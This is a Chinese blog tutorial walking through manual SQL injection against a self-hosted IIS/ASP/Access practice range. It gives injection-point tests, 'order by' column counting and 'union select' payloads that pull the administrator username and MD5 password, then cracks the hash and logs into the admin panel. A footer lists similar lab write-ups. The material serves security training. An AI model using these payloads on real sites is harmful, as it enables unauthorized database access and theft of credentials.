Access手工注入靶场(附环境搭建教程)

最新推荐文章于 2024-08-20 14:16:02 发布
最新推荐文章于 2024-08-20 14:16:02 发布
阅读量529 收藏 9
点赞数 15
文章标签: python github git svn 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82451607/article/details/141353130
版权

环境搭建资源:

百度网盘链接: https://pan.baidu.com/s/1I_ba8kB280LZB0eEilNHJA 提取码: kcr2

1.将环境附件的压缩包解压到网站根目录(wwwroot)下  

2.访问IIS服务器绑定的IP地址 即可访问到靶场

3.点开新闻页面 发现url地址有id参数 

4.尝试进行注入 判断注入点

在url后加引号 发现页面报错 说明存在注入点

在后面进行逻辑判断 and 1=1 发现页面正常

/news_view.asp?id=10 and 1=2 跟错误的逻辑判断时 页面报错

5.判断有几个字段

news_view.asp?id=10 order by 7  当字段为7时 页面显示正常 

news_view.asp?id=10 order by 8  当字段为8时 页面报错 说明只有7个字段

6.尝试寻找回显点

注意:access与MySQL的查询语法不同

access的查询语法是select * from 表名

表名只能靠字节猜测 常见的表名或字段名:admin、users、username、user_name admin_user、administrator

尝试表名为users 页面报错 说明不存在users表

news_view.asp?id=10 union select 1,2,3,4,5,6,7 from users

尝试表名为administrator时 页面正常 出现回显点

news_view.asp?id=10 union select 1,2,3,4,5,6,7 from administrator

7.尝试查询后台登录用户的用户名和密码

表的字段名只能靠猜

在回显点的位置查询我们要查询的语句 

news_view.asp?id=10 union select 1,user_name,3,4,5,6,7 from administrator

尝试用户名的字段=user_name时 页面显示正常 返回了用户名为admin

尝试密码的字段为password时 页面正常显示 并返回了一串加密后的密码

/news_view.asp?id=10 union select 1,user_name,password,4,5,6,7 from administrator

8.使用在线网站解密加密后的MD5密码

在线解密网站:md5在线解密破解,md5解密加密

解密后的密码为admin

9.查找网站的后台登录地址 并登录后台

使用御剑进行目录扫描 可以看到有一个index.asp

在网站访问index.asp

http://172.16.1.137/admin/index.asp

可以看到是后台登录管理系统

用户名 admin        密码 admin 可以登录成功

到此 注入完成!

cc775210
关注
  • 15
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者靶场 入门:SQL手工注入漏洞测试(Access数据库
qq_43233085的博客
01-10 1198
入门:SQL手工注入漏洞测试(Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
DVWA靶场搭建教程,网站搭建
09-06
【DVWA靶场搭建教程,网站搭建】 DVWA(Damn Vulnerable Web Application)是一个非常流行的在线安全学习平台,用于教育和测试网络安全技能。这个靶场包含了一系列不同级别的漏洞,如SQL注入、XSS攻击、文件包含等...
Access手工注入靶场环境搭建
2301_82061181的博客
08-20 261
Access手工注入靶场环境搭建
access手工注入靶场环境搭建
最新发布
qq_45079558的博客
08-20 42
判断字段列数,输入order by 4正常 ,输入order by 5 不正常,判断为4列。输入id=1 and 1=2 union select 1,2,3,4 from admin。将错误发送到浏览器改为‘True’ 将启用父路径改为‘True’将靶场的压缩包解压到当前的根目录下(一键三连截图私聊发靶场压缩包)访问IIS服务器绑定的IP地址,即可访问网站靶场。点击服务器主页下的IIS下的ASP。输入id=1 and 1=1正常。先在电脑的搜索框中搜索IIS。点击应用池下的网站的高级设置。
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5598
SQL注入环境搭建及多种注入类型测试实验
【墨者学院】SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1146
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
oracle手工报错注入,注入
weixin_34515601的博客
04-10 453
Spring的常用注解2021-01-21 13:03:49① @Component:使用在普通java类上② @Service:使用在业务层类上作用:声明一个类的对象为bean对象,相当于配置了bean标签。注意:相当于使用的是无参数构造器来创建对象。问题:只使用@Service注解,和 A a=new A();的效果是相同的,创建的是一个没有初始化数据的bean对象,但是在sqlmap2021...
【送书活动第2期】打靶Portswigger系列—— 一口气通关18个SQL注入靶场详细流程(文末送书)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-22 1251
BurpSuite自带就有靶场,而BP又是全球最牛的渗透工具之一,是国外专业安全团队长期维护的项目,所以安全学院做得非常不错,里面的靶场(安全实验室Libs)包含了几乎所有常见的Web漏洞,在2024年的今天,我是十分推荐大家去使用的!!
SQL手工注入漏洞测试(Access数据库)
硫酸超的博客
07-29 624
判断注入点 http://219.153.49.228:48466/new_list.asp?id=1%20and%201=2 http://219.153.49.228:48466/new_list.asp?id=1%20and%201=1 猜字段 http://219.153.49.228:48466/new_list.asp?id=1%20order%20by%205 字段数为4
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
m0_67844671的博客
10-01 1156
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
图文详解PHP环境搭建教程
10-21
【PHP环境搭建教程】 PHP(Hypertext Preprocessor)是一种广泛应用的开源脚本语言,尤其适合Web开发。自1995年由Rasmus Lerdorf创建以来,PHP经历了长期发展,成为了全球开发者首选的服务器端编程语言之一。PHP5...
SQL环境搭建教程
03-20
SQL环境搭建教程 目录: (一) SQL安装常识 (二)什么是"数据库"和新"建立数据库"以及的区别 (三)数据库导入与导出 (四)数据库收缩与分离 (五)数据库备份/还原 (六)(安装常见错误 (七)如何测试SQL (八)ACCESS转化...
Access 基础篇教程.pdf,适合Access学习使用
10-26
教程Access 基础篇教程》显然旨在为初学者提供一个全面了解和学习Access的基础知识平台。 在学习Access之前,首先要理解数据库的基本概念,包括数据表、字段、记录和键等。Access允许用户通过用户友好的界面...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
Python】入门到放弃之第九章《字典》
MP13537560060的博客
08-15 716
这是本系列的第九章节内容,《字典》。在Python中,字典(Dictionary)是一种内置的数据结构,用于存储键值对(key-value pairs)。字典是可变的,意味着你可以在创建字典后添加、删除或修改其中的元素。字典的键(key)必须是唯一的,并且是不可变的(即,它们必须是不可变数据类型,如字符串、数字或元组,但不能是列表或字典等可变类型)。字典的值(value)则可以是任何数据类型,包括列表、元组、字典等。以上,就是Python中字典的全部内容。
Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【代码文档】
一诺的博客
08-16 620
教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
湖北师范大学-Python程序设计-3.1 中国古代数学问题(project)
柠檬喝汽水的博客
08-19 450
唐朝时,一斗酒的斗所采用的度量是小斗,也就是4斤,当时一斤取值范围大约在500多到600克左右,换算一下可知唐朝一斗酒的重量取值范围在2000克到2400克左右。有一座八层宝塔,每一层都有一些琉璃灯,每一层的灯数都是上一层的二倍,已知共有 765 盏琉璃灯,计算并输出每层各有多少盏琉璃灯。输出不超过 n 且满足条件的物品个数 m,如果有多个解,则分行输出,每行一个解;第二行输出 2 个浮点数,依次为小鼠和大鼠打洞的距离,单位为尺,保留小数点后 1 位数字。一个浮点数 f,表示李白的酒壶原来有 f 斗酒。
SciPy:基于 NumPy 的算法库和数学工具包,用于数学、科学和工程领域。
LS_Ai的博客
08-15 982
无论是进行线性代数运算、优化问题求解、积分与微分方程处理,还是进行信号和图像处理,SciPy都提供了高度优化的工具,使得复杂的科学计算任务变得更加简单和高效。SciPy的目标是为用户提供一个全面的科学计算环境,其中涵盖了常见的线性代数、优化、积分、插值、傅里叶变换、信号处理、统计、图像处理、以及ODE(常微分方程)求解等功能。SciPy与NumPy紧密结合,同时也与Pandas、Matplotlib等库有很好的兼容性,这使得它在科学研究、数据分析和工程计算中占据了重要地位。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值